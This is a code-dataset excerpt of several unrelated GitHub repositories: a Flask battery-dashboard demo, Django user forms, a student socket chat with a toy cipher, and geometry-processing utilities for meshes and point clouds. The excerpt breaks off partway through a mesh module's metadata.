09212293457cd6256cc979ddeafeabd2b41cf6b6
|
8c09eaef29de2347dd8a5a97d842b579c04d3cda
|
56a026fff3737b556c904ccbdec6bb58601ba8d7
|
refs/heads/master
| 2023-05-26T06:56:49.216061 | 2021-06-17T18:05:11 | 2021-06-17T18:05:11 | 377,591,190 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6087613105773926,
"alphanum_fraction": 0.6208459138870239,
"avg_line_length": 24.960784912109375,
"blob_id": "17326dd1f8e3cb4a2dc50493c68a1b1884098eba",
"content_id": "b035fa29aa9278ef04b2a74dc88e5912736567ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1324,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 51,
"path": "/application.py",
"repo_name": "bbuchanan208/VerveDemo",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template\n\n# AWS sometimes likes \"application\" instead of \"app\", using both makes for less headaches\napp = application = Flask(__name__)\n\n\[email protected]('/')\ndef home():\n return render_template('index.html')\n\n\n# Normally I wouldn't create three separate routes, but this will allow me to link the pages with the buttons and no\n# additional arguments\[email protected]('/full')\ndef full():\n context = {\n \"battery_percent\": 100,\n \"hours_remaining\": \"12\",\n \"minutes_remaining\": \"00\",\n \"firmware_needs_update\": False,\n \"maintenance_needed\": False,\n }\n return render_template('dashboard.html', context=context)\n\n\[email protected]('/low')\ndef low():\n context = {\n \"battery_percent\": 20,\n \"hours_remaining\": \"2\",\n \"minutes_remaining\": \"24\",\n \"firmware_needs_update\": True,\n \"maintenance_needed\": False,\n }\n return render_template('dashboard.html', context=context)\n\n\[email protected]('/very_low')\ndef very_low():\n context = {\n \"battery_percent\": 6,\n \"hours_remaining\": \"0\",\n \"minutes_remaining\": \"43\",\n \"firmware_needs_update\": True,\n \"maintenance_needed\": True,\n }\n return render_template('dashboard.html', context=context)\n\n\nif __name__ == '__main__':\n application.run(debug=False)\n"
},
{
"alpha_fraction": 0.7680000066757202,
"alphanum_fraction": 0.7680000066757202,
"avg_line_length": 40.66666793823242,
"blob_id": "1ba488a709945e863c9d07ea5b211602b6f326b8",
"content_id": "5f3caaaefdec03eb1876dd4c9dc853170d8368dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 125,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 3,
"path": "/README.md",
"repo_name": "bbuchanan208/VerveDemo",
"src_encoding": "UTF-8",
"text": "# VerveDemo\n\nA quick, simple flask application to get the attention of the folks at [Verve Motion](https://vervemotion.com/)\n"
}
] | 2 |
vidalchile/usuarios-django
|
https://github.com/vidalchile/usuarios-django
|
81488b66e309da6ef6800c716e1d5305a283ae43
|
32637fbba248f2bbf927bc76eb28ebcdf3a5002b
|
48b21ef14752b46fbcd6f1fb039dc1e686d63b15
|
refs/heads/master
| 2023-01-14T16:11:55.452672 | 2020-11-03T02:16:11 | 2020-11-03T02:16:11 | 297,802,800 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6062864661216736,
"alphanum_fraction": 0.6130914092063904,
"avg_line_length": 28.95145606994629,
"blob_id": "fef0c7a90bdbfe07ebc75b6053b911ec56f3e1a0",
"content_id": "f6bc38aef73525a2cc4e3f745fbb690a19f01b1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3097,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 103,
"path": "/usuarios/applications/users/forms.py",
"repo_name": "vidalchile/usuarios-django",
"src_encoding": "UTF-8",
"text": "from django import forms\n\nfrom .models import User\n\nfrom django.contrib.auth import authenticate\n\nclass UserRegisterForm(forms.ModelForm):\n \n password1 = forms.CharField( \n label='Contraseña',\n required=True, \n max_length=32,\n widget=forms.PasswordInput(attrs={'placeholder': 'Ingresar una contraseña'})\n )\n\n password2 = forms.CharField(\n label='Repetir Contraseña',\n required=True,\n max_length=32, \n widget=forms.PasswordInput(attrs={'placeholder': 'Repetir contraseña'})\n )\n\n class Meta:\n model = User\n # muestra solo algunos campos del modelo\n fields = (\n 'username',\n 'email',\n 'nombres',\n 'apellidos',\n 'genero',\n 'password1',\n 'password2',\n )\n \n def clean_password2(self):\n if len(self.cleaned_data['password1']) < 5:\n self.add_error('password1', 'Las contraseña debe tener mas de 5 digitos')\n elif self.cleaned_data['password1'] != self.cleaned_data['password2']:\n self.add_error('password2', 'Las contraseñas no son iguales')\n\n\nclass LoginForm(forms.Form):\n \n username = forms.CharField( \n label='username',\n required=True, \n widget=forms.TextInput(attrs={'placeholder': 'Username'})\n )\n\n password = forms.CharField( \n label='Contraseña',\n required=True, \n max_length=32,\n widget=forms.PasswordInput(attrs={'placeholder': 'Ingresar contraseña'})\n )\n\n # django sabe que es una de las primeras funciones que tiene que ejecutar\n def clean(self):\n cleaned_data = super(LoginForm, self).clean()\n username = self.cleaned_data['username']\n password = self.cleaned_data['password']\n\n if not authenticate(username=username, password=password):\n raise forms.ValidationError('Los datos de usuario no son correctos')\n return cleaned_data\n\n\nclass UpdatePasswordForm(forms.Form):\n \n password_actual = forms.CharField( \n label='Contraseña Actual',\n required=True, \n widget=forms.PasswordInput(attrs={'placeholder': 'Contraseña Actual'})\n )\n\n password_nueva = forms.CharField( \n label='Contraseña Nueva',\n required=True, \n max_length=32,\n widget=forms.PasswordInput(attrs={'placeholder': 'Contraseña Nueva'})\n )\n\n\nclass VerificationForm(forms.Form):\n \n codigo_registro = forms.CharField(required=True)\n\n def __init__(self, pk, *args, **kwargs):\n self.id_user = pk\n super(VerificationForm, self).__init__(*args, **kwargs)\n \n def clean_codigo_registro(self):\n codigo = self.cleaned_data['codigo_registro']\n\n if len(codigo) != 6:\n raise forms.ValidationError('el codigo es incorrecto')\n \n # verificar si el codigo y el id de usuario son validos:\n usuario_activo = User.objects.cod_validation(self.id_user, codigo)\n\n if not usuario_activo:\n raise forms.ValidationError('el codigo es incorrecto')\n\n"
},
{
"alpha_fraction": 0.8199999928474426,
"alphanum_fraction": 0.8199999928474426,
"avg_line_length": 24,
"blob_id": "866afd11fe5aab050a45e4de4dd89fd1eff4e430",
"content_id": "d6ac9d06f74b559ac376f84e583d1e57abdb004d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 2,
"path": "/README.md",
"repo_name": "vidalchile/usuarios-django",
"src_encoding": "UTF-8",
"text": "# usuarios-django\nProyecto de la sección usuarios\n"
},
{
"alpha_fraction": 0.7559808492660522,
"alphanum_fraction": 0.760765552520752,
"avg_line_length": 29,
"blob_id": "265b4f860d6e4eaef96473e7fd04e776b33c3e36",
"content_id": "e4d0420e5ef041defd41d361821b878c01c4a28b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 210,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 7,
"path": "/usuarios/applications/users/functions.py",
"repo_name": "vidalchile/usuarios-django",
"src_encoding": "UTF-8",
"text": "# funciones extras para mi aplicación users\n\nimport random\nimport string\n\ndef code_generator(size=6, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))"
}
] | 3 |
grupo10basaezsilva/websocket
|
https://github.com/grupo10basaezsilva/websocket
|
d3205ad5bcf05eea466f26b281d50174e8468cd2
|
9f7ec5486045fa41430b098fb2349aa3d82a1c90
|
b2915ca7c37862fed98dc964bc1be58bd165c8a3
|
refs/heads/main
| 2023-01-09T09:13:52.138411 | 2020-11-07T01:51:30 | 2020-11-07T01:51:30 | 310,467,228 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6264591217041016,
"alphanum_fraction": 0.6451361775398254,
"avg_line_length": 24.8125,
"blob_id": "8f60abefaf5745e1ad239c905e825e68b6dbdea7",
"content_id": "696e8c9054a9670ab97e3a5b6e69e65938ac033b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1289,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 48,
"path": "/client.py",
"repo_name": "grupo10basaezsilva/websocket",
"src_encoding": "UTF-8",
"text": "import socket\r\n\r\nfrom uuid import getnode as get_mac\r\n\r\nHEADER = 64\r\nPORT = 3074\r\nSERVER = '158.251.91.68'\r\nADDR = (SERVER, PORT)\r\nFORMAT = 'utf-8'\r\nDISCONNECT_MESSAGE = 'DISCONNECT!'\r\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nclient.connect(ADDR)\r\n\r\ndef send(msg):\r\n #Con get_mac() sacamos la MAC del cliente en formato INT\r\n #con str() se trasforma a string y\r\n #se concatena con el mensaje deseado:\r\n mensajeCifrado = cifrador(msg)\r\n msg = str(get_mac()) + mensajeCifrado\r\n\r\n message = msg.encode(FORMAT)\r\n\r\n # Obtener largo mensaje:\r\n msg_length = len(message)\r\n # Codificar en UTF-8 el largo del mensaje:\r\n send_length = str(msg_length).encode(FORMAT)\r\n # Se le agrega\r\n send_length += b' ' * (HEADER - len(send_length))\r\n # Acá se envía el largo:\r\n client.send(send_length)\r\n # Y acá el mensaje.\r\n client.send(message)\r\n # Confirmación de mensaje enviado\r\n print(client.recv(2048).decode(FORMAT))\r\n \r\ndef cifrador(mensajePlano):\r\n mensajeCifrado = \"\"\r\n for x in range(0, 5):\r\n for y in range(x, len(mensajePlano), 5):\r\n mensajeCifrado += mensajePlano[y]\r\n return mensajeCifrado\r\n\r\n# Mensajes a enviar:\r\nsend('hello')\r\ninput()\r\nsend('asdfasdf')\r\ninput()\r\nsend(DISCONNECT_MESSAGE)"
},
{
"alpha_fraction": 0.5653241872787476,
"alphanum_fraction": 0.5957760214805603,
"avg_line_length": 31.37704849243164,
"blob_id": "cd454b3d267a3c7d7f23d365444d95fbd1ddbdea",
"content_id": "81314c6d0c3474c27cc7bd749a7137a466b53170",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2038,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 61,
"path": "/server.py",
"repo_name": "grupo10basaezsilva/websocket",
"src_encoding": "UTF-8",
"text": "import socket\r\nimport threading\r\n\r\nHEADER = 64\r\nPORT = 3074\r\nSERVER = '158.251.91.68'\r\nADDR = (SERVER, PORT)\r\nFORMAT = 'utf-8'\r\nDISCONNECT_MESSAGE = 'DISCONNECT!'\r\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n#Se agrega la variable macHandshake que contiene las MAC de los clientes permitidos\r\nmacHandshake1 = '40271575130816' #Manuel\r\nmacHandshake2 = '62488678593688' #Franco\r\n\r\nserver.bind(ADDR)\r\n\r\ndef handle_client(conn, addr):\r\n print(f\"[NEW CONNECTION] {addr} connected.\")\r\n connected = True\r\n while connected:\r\n msg_length = conn.recv(HEADER).decode(FORMAT)\r\n if msg_length:\r\n msg_length = int(msg_length)\r\n msg = conn.recv(msg_length).decode(FORMAT)\r\n mac = msg[0:14]\r\n #La solución puede ser mejorada, pero funciona!\r\n while mac != macHandshake1 and mac != macHandshake2:\r\n print('CLIENTE RECHAZADO')\r\n server.close()\r\n server.shutdown(1)\r\n if msg[14:] == DISCONNECT_MESSAGE:\r\n connected = False\r\n #Acá se muestra el mensaje:\r\n msjCifrado = msg[14:]\r\n msjDecifrado = decifrador(msjCifrado);\r\n print(f\"[{addr}][{mac}] {msjDecifrado}\")\r\n conn.send(\"Msg received\".encode(FORMAT))\r\n conn.close()\r\n\r\ndef start():\r\n server.listen()\r\n print(f\"[LISTEN] Server is listening on address {ADDR}\")\r\n while True:\r\n conn, addr = server.accept()\r\n thread = threading.Thread(target=handle_client, args=(conn, addr))\r\n thread.start()\r\n counter=threading.activeCount()\r\n print(f\"[ACTIVE CONNECTIONS] {counter - 1}\")\r\n\r\ndef decifrador(mensajeCifrado):\r\n mensajeDecifrado = [\"\"] * len(mensajeCifrado)\r\n #Variable aux\r\n i = 0\r\n for x in range(0, 5):\r\n for y in range(x, len(mensajeDecifrado), 5):\r\n mensajeDecifrado[y] = mensajeCifrado[i]\r\n i += 1\r\n return ''.join(mensajeDecifrado)\r\n\r\nprint(\"[STARTING] server is running.....\")\r\nstart()\r\n"
}
] | 2 |
optas/geo_tool
|
https://github.com/optas/geo_tool
|
84a63c8dd9e9881234737a816a2a5b119e4368eb
|
7eda787b4b9361ee6cb1601a62495d9d5c3605e6
|
4cd4e5c39523f5889efb676414c5f4e58bc38991
|
refs/heads/master
| 2022-02-26T18:03:09.930737 | 2022-01-23T03:19:46 | 2022-01-23T03:19:46 | 67,737,034 | 7 | 3 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6334841847419739,
"alphanum_fraction": 0.6606335043907166,
"avg_line_length": 21.100000381469727,
"blob_id": "61a76f6ba38241ffedbe671ae4438dfc0ae0ae8b",
"content_id": "54bfa5f89e69b8f8946df5994b259d109e6ff325",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 221,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 10,
"path": "/scripts/Test_Cases.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 14, 2016\n\n@author: Panos Achlioptas\n@contact: [email protected]\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes. \n'''\n\nimport numpy as np\n"
},
{
"alpha_fraction": 0.6551724076271057,
"alphanum_fraction": 0.6661441922187805,
"avg_line_length": 30.27450942993164,
"blob_id": "42454c87ce0ce902a259c994b0c44a50ca4ae627",
"content_id": "5e6b86b7414e944d946787cdf2465afba0050baf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3190,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 102,
"path": "/utils/linalg_utils.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on June 14, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport numpy as np\nimport scipy.sparse as sps\nimport warnings\nfrom numpy.linalg import matrix_rank\n\nl2_norm = np.linalg.norm\n\n\ndef is_close(a, b, atol=0):\n sp_a = sps.issparse(a)\n sp_b = sps.issparse(b)\n if sp_a and sp_b:\n return (abs(a - b) > atol).nnz == 0\n elif not sp_a and not sp_b:\n return (np.allclose(a, b, atol=atol))\n else:\n return (abs(a - b) <= atol).all()\n\n\ndef is_symmetric(array, tolerance=10e-6):\n if sps.issparse(array):\n return (abs(array - array.T) > tolerance).nnz == 0\n else:\n return np.allclose(array, array.T, atol=tolerance, rtol=0)\n\n\ndef is_finite(array):\n if sps.issparse(array):\n array = array.tocoo().data\n return np.isfinite(array).all()\n\n\ndef is_orthogonal(array, axis=1, tolerance=10e-6):\n ''' axis - (optional, 0 or 1, default=1). If 0 checks for orthogonality of rows, else of columns.\n '''\n if axis == 0:\n gram_matrix = array.dot(array.T)\n else:\n gram_matrix = array.T.dot(array)\n\n if sps.issparse(gram_matrix):\n gram_matrix = gram_matrix.todense()\n np.fill_diagonal(gram_matrix, 0)\n return np.allclose(gram_matrix, np.zeros_like(gram_matrix), atol=tolerance, rtol=0)\n\n\ndef is_square_matrix(array):\n return array.ndim == 2 and array.shape[0] == array.shape[1]\n\n\ndef is_increasing(l):\n return all(l[i] <= l[i + 1] for i in xrange(len(l) - 1))\n\n\ndef is_decreasing(l):\n return all(l[i] >= l[i + 1] for i in xrange(len(l) - 1))\n\n\ndef order_of_elements_after_deletion(num_elements, delete_index):\n '''\n Assuming a sequence of num_elements index in [0-num_elements-1] and a list of indices to be deleted from the sequence,\n creates the mapping from the remaining elements to their position in the new list created after the deletion takes place.\n '''\n delete_index = np.unique(delete_index)\n init_list = np.arange(num_elements)\n after_del = np.delete(init_list, delete_index)\n return {key: i for i, key in enumerate(after_del)}\n\n\ndef are_coplanar(points):\n return matrix_rank(points) > 2\n\n\ndef accumarray(subs, val):\n ''' Matlab inspired function.\n A = accumarray(subs,val) returns array A by accumulating elements of vector\n val using the subscripts subs. If subs is a column vector, then each element\n defines a corresponding subscript in the output, which is also a column vector.\n The accumarray function collects all elements of val that have identical subscripts\n in subs and stores their sum in the location of A corresponding to that\n subscript (for index i, A(i)=sum(val(subs(:)==i))).\n '''\n return np.bincount(subs, weights=val)\n\n\ndef sort_spectra(evals, evecs, transformer=None):\n if transformer is None:\n index = np.argsort(evals) # Sort evals from smallest to largest\n else:\n index = np.argsort(transformer(evals)) # Sort evals from smallest to largest\n evals = evals[index]\n evecs = evecs[:, index]\n assert(is_increasing(evals))\n return evals, evecs\n"
},
{
"alpha_fraction": 0.6461169123649597,
"alphanum_fraction": 0.6509207487106323,
"avg_line_length": 38.03125,
"blob_id": "a22da43efc07fb6bcd1cf2c7707761ec3a7d5267",
"content_id": "b81de8a37f103e145aaaab291ea2aab0a93b47a4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1249,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 32,
"path": "/scripts/mesh_lab_wrapper.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''Created on June 14, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes.\n'''\n\n\nfrom subprocess import call as sys_call\nfrom os import path as osp\nfrom general_tools.in_out.basics import files_in_subdirs, copy_folder_structure\n\nmesh_lab_binary = '/Applications/meshlab.app/Contents/MacOS/meshlabserver'\n\n\ndef apply_script_to_files(top_folder, out_top_dir, script_file, regex='.off$'):\n input_files = files_in_subdirs(top_folder, regex)\n copy_folder_structure(top_folder, out_top_dir)\n for in_f in input_files:\n out_f = osp.join(out_top_dir, in_f.replace(top_folder, ''))\n sys_call([mesh_lab_binary, '-i', in_f, '-o', out_f, '-s', script_file])\n\n\ndef convert_to_obj(top_folder, out_top_dir, do_nothing_mlx, regex='.off$'):\n input_files = files_in_subdirs(top_folder, regex)\n copy_folder_structure(top_folder, out_top_dir)\n for in_f in input_files:\n out_f = osp.join(out_top_dir, in_f.replace(top_folder, ''))\n out_f = out_f[:-len('off')] # TODO -> works only for .off\n out_f = out_f + 'obj'\n sys_call([mesh_lab_binary, '-i', in_f, '-o', out_f, '-s', do_nothing_mlx])\n"
},
{
"alpha_fraction": 0.6509009003639221,
"alphanum_fraction": 0.6734234094619751,
"avg_line_length": 26.75,
"blob_id": "d10cb26f34d67ee106aeccd66aab2022255d5d00",
"content_id": "9785ab2c55a455d7611407862b32c6c04b813332",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 16,
"path": "/private/consider.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on December 21, 2016.\nKeep things that you will consider to include in main library.\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes.\n'''\n\nfrom mayavi import mlab as mayalab\n\n\ndef plot_vector_field(points, vx, vy, vz):\n mayalab.quiver3d(points[:, 0], points[:, 1], points[:, 2], vx, vy, vz)\n mayalab.show()\n"
},
{
"alpha_fraction": 0.6174121499061584,
"alphanum_fraction": 0.6224707365036011,
"avg_line_length": 38.95744705200195,
"blob_id": "e9e097618072e54a23e1ab71bd7852f3953df162",
"content_id": "38a1e0cfe662e939b83d30b2d1f7551ffe339a0c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3756,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 94,
"path": "/rendering/back_tracer.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jul 25, 2016\n\n@author: Panos Achlioptas\n@contact: [email protected]\n@copyright: You are free to use, change, or redistribute this code in any way\nyou want for non-commercial purposes.\n'''\n\nimport glob\nimport os\nimport os.path as osp\nfrom subprocess import call as sys_call\n\nfrom .. in_out import soup as io\n\n\nclass Back_Tracer():\n '''\n A class providing the basic functionality for converting information\n regarding 2D rendered output of Fythumb into back into thr 3D space\n of the Mesh models.\n '''\n\n fythumb_bin = '/Users/optas/Documents/Eclipse_Projects/3d/thumb3d/build/thumb3d'\n\n def __init__(self, triangle_folder, in_mesh):\n '''\n Constructor.\n '''\n self.mesh = in_mesh\n self.map = Back_Tracer.generate_pixels_to_triangles_map(triangle_folder, in_mesh)\n\n def from_2D_to_3D(self, pixels, vertex_id, twist_id):\n return self.map[vertex_id, twist_id][pixels]\n\n def is_legit_view_and_twist(self, vertex_id, twist_id):\n return (vertex_id, twist_id) in self.map\n\n @staticmethod\n def render_views_of_shapes(top_dir, output_dir, regex):\n io.copy_folder_structure(top_dir, output_dir)\n mesh_files = io.files_in_subdirs(top_dir, regex)\n if output_dir[-1] != os.sep:\n output_dir += os.sep\n\n for f in mesh_files:\n out_sub_folder = f.replace(top_dir, output_dir)\n mark = out_sub_folder[::-1].find('.') # Find last occurrence of '.' to remove the ending (e.g., .txt)\n if mark > 0:\n out_sub_folder = out_sub_folder[:-mark - 1]\n Back_Tracer.fythumb_compute_views_of_shape(f, out_sub_folder)\n\n @staticmethod\n def fythumb_compute_views_of_shape(mesh_file, output_dir):\n sys_call([Back_Tracer.fythumb_bin, '-i', mesh_file, '-o', output_dir, '-r'])\n\n @staticmethod\n def pixels_to_triangles(pixel_file, off_file, camera_vertex, camera_twist, output_dir, out_file_name):\n sys_call([Back_Tracer.fythumb_bin, '-i', off_file, '-s', pixel_file, '-o', output_dir,\n '-v', camera_vertex, '-t', camera_twist, '-f', out_file_name])\n\n @staticmethod\n def compute_triangles_from_pixels(off_file, pixels_folder, output_folder):\n searh_pattern = osp.join(pixels_folder, '*.txt')\n c = 0\n for pixel_file in glob.glob(searh_pattern):\n camera_vertex, camera_twist = io.name_to_cam_position(pixel_file, cam_delim='_')\n out_file_name = '%d_%d.txt' % (camera_vertex, camera_twist)\n print 'Computing Triangles for %s file.' % (pixel_file)\n Back_Tracer.pixels_to_triangles(pixel_file, off_file, str(camera_vertex), str(camera_twist), output_folder, out_file_name)\n c += 1\n print 'Computed the triangles for %d files.' % (c)\n\n @staticmethod\n def generate_pixels_to_triangles_map(triangle_folder, in_mesh):\n searh_pattern = osp.join(triangle_folder, '*.txt')\n inv_dict = in_mesh.inverse_triangle_dictionary()\n res = dict()\n for triangle_file in glob.glob(searh_pattern):\n camera_vertex, camera_twist = io.name_to_cam_position(triangle_file, cam_delim='_')\n res[(camera_vertex, camera_twist)] = dict()\n pixels, triangles, _ = io.read_triangle_file(triangle_file)\n triangles = map(tuple, triangles)\n triangles = [inv_dict[tr] for tr in triangles]\n pixels = map(tuple, pixels)\n res[(camera_vertex, camera_twist)] = {key: val for key, val in zip(pixels, triangles)}\n return res\n\nif __name__ == '__main__': \n from geo_tool.solids.mesh import Mesh\n in_mesh = Mesh('../Data/Screw/screw.off')\n bt = Back_Tracer('../Data/Screw/Salient_Triangles', in_mesh)\n print bt\n"
},
{
"alpha_fraction": 0.5539358854293823,
"alphanum_fraction": 0.5597667694091797,
"avg_line_length": 30.625,
"blob_id": "25efa5aab00cca93a12a3551bfc36ef98727727a",
"content_id": "678af4463361b6d5f1517dda1629287f9f6204de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1029,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 32,
"path": "/scripts/basic_qts_on_model_net_10.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 14, 2016\n\n@author: Panos Achlioptas\n@contact: [email protected]\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes. \n'''\n\nimport os.path as osp\n\nfrom nn_saliency.src.mesh import Mesh\nimport nn_saliency.src.nn_io as nn_io\n\nclass_names = ['bathtub', 'bed', 'chair', 'desk', 'dresser', 'monitor', \n 'night_stand', 'sofa', 'table', 'toilet' ]\n\n\ndef connected_components_per_category(top_dir):\n res = dict()\n for category in class_names:\n category_dict = dict()\n look_at = osp.join(top_dir, category) \n off_files = nn_io.files_in_subdirs(look_at, '.off$')\n for model in off_files: \n in_mesh = Mesh(model)\n print in_mesh\n model_name = osp.basename(model)\n n_cc, _ = in_mesh.connected_components() \n category_dict[model_name] = n_cc \n res[category] = category_dict \n return res\n \n "
},
{
"alpha_fraction": 0.6204202771186829,
"alphanum_fraction": 0.6414331793785095,
"avg_line_length": 35.40196228027344,
"blob_id": "84cde06244cc011a3a7ae182d30b956383dc9e3b",
"content_id": "1875110bb05ac37092d93f63297800da5c1efd46",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3712,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 102,
"path": "/point_clouds/aux.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Aug 21, 2017\n\n@author: optas\n'''\nimport warnings\nimport numpy as np\nfrom sklearn.neighbors import NearestNeighbors\nfrom scipy.sparse.linalg import eigs\nfrom numpy.linalg import norm\n\nfrom .. fundamentals import Graph\nfrom .. utils.linalg_utils import l2_norm\n\ndef greedy_match_pc_to_pc(from_pc, to_pc):\n '''map from_pc points to to_pc by minimizing the from-to-to euclidean distance.'''\n nn = NearestNeighbors(n_neighbors=1).fit(to_pc)\n distances, indices = nn.kneighbors(from_pc)\n return indices, distances\n\n\ndef chamfer_pseudo_distance(pc1, pc2):\n _, d1 = greedy_match_pc_to_pc(pc1, pc2)\n _, d2 = greedy_match_pc_to_pc(pc2, pc1)\n return np.sum(d1) + np.sum(d2)\n\n\ndef laplacian_spectrum(pc, n_evecs, k=6):\n ''' k: (int) number of nearest neighbors each point is connected with in the constructed Adjacency\n matrix that will be used to derive the Laplacian.\n '''\n neighbors_ids, distances = pc.k_nearest_neighbors(k)\n A = Graph.knn_to_adjacency(neighbors_ids, distances)\n if Graph.connected_components(A)[0] != 1:\n raise ValueError('Graph has more than one connected component, increase k.')\n A = (A + A.T) / 2.0\n L = Graph.adjacency_to_laplacian(A, 'norm').astype('f4')\n evals, evecs = eigs(L, n_evecs + 1, sigma=-10e-1, which='LM')\n if np.any(l2_norm(evecs.imag, axis=0) / l2_norm(evecs.real, axis=0) > 1.0 / 100):\n warnings.warn('Produced eigen-vectors are complex and contain significant mass on the imaginary part.')\n\n evecs = evecs.real # eigs returns complex values by default.\n evals = evals.real\n\n index = np.argsort(evals) # Sort evals from smallest to largest\n evals = evals[index]\n evecs = evecs[:, index]\n return evals, evecs\n\n\ndef unit_cube_grid_point_cloud(resolution, clip_sphere=False):\n '''Returns the center coordinates of each cell of a 3D grid with resolution^3 cells,\n that is placed in the unit-cube.\n If clip_sphere it True it drops the \"corner\" cells that lie outside the unit-sphere.\n '''\n grid = np.ndarray((resolution, resolution, resolution, 3), np.float32)\n spacing = 1.0 / float(resolution - 1)\n for i in xrange(resolution):\n for j in xrange(resolution):\n for k in xrange(resolution):\n grid[i, j, k, 0] = i * spacing - 0.5\n grid[i, j, k, 1] = j * spacing - 0.5\n grid[i, j, k, 2] = k * spacing - 0.5\n\n if clip_sphere:\n grid = grid.reshape(-1, 3)\n grid = grid[norm(grid, axis=1) <= 0.5]\n\n return grid, spacing\n\n\ndef point_cloud_to_volume(points, vsize, radius=1.0):\n \"\"\" input is Nx3 points.\n output is vsize*vsize*vsize\n assumes points are in range [-radius, radius]\n Original from https://github.com/daerduoCarey/partnet_seg_exps/blob/master/exps/utils/pc_util.py\n \"\"\"\n vol = np.zeros((vsize,vsize,vsize))\n voxel = 2*radius/float(vsize)\n locations = (points + radius)/voxel\n locations = locations.astype(int)\n vol[locations[:, 0], locations[:, 1], locations[:, 2]] = 1.0\n return vol\n\n\ndef volume_to_point_cloud(vol):\n \"\"\" vol is occupancy grid (value = 0 or 1) of size vsize*vsize*vsize\n return Nx3 numpy array.\n Original from Original from https://github.com/daerduoCarey/partnet_seg_exps/blob/master/exps/utils/pc_util.py\n \"\"\"\n vsize = vol.shape[0]\n assert(vol.shape[1] == vsize and vol.shape[1] == vsize)\n points = []\n for a in range(vsize):\n for b in range(vsize):\n for c in range(vsize):\n if vol[a,b,c] == 1:\n points.append(np.array([a, b, c]))\n if len(points) == 0:\n return np.zeros((0, 3))\n points = np.vstack(points)\n return points"
},
{
"alpha_fraction": 0.5666472315788269,
"alphanum_fraction": 0.5849120616912842,
"avg_line_length": 41.014286041259766,
"blob_id": "9c7fa48cd560af8938e5f6d340de5381d5fe1cf9",
"content_id": "959a355d257987f9d7434dc4729d0e2ce6162af0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20586,
"license_type": "permissive",
"max_line_length": 168,
"num_lines": 490,
"path": "/solids/mesh.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
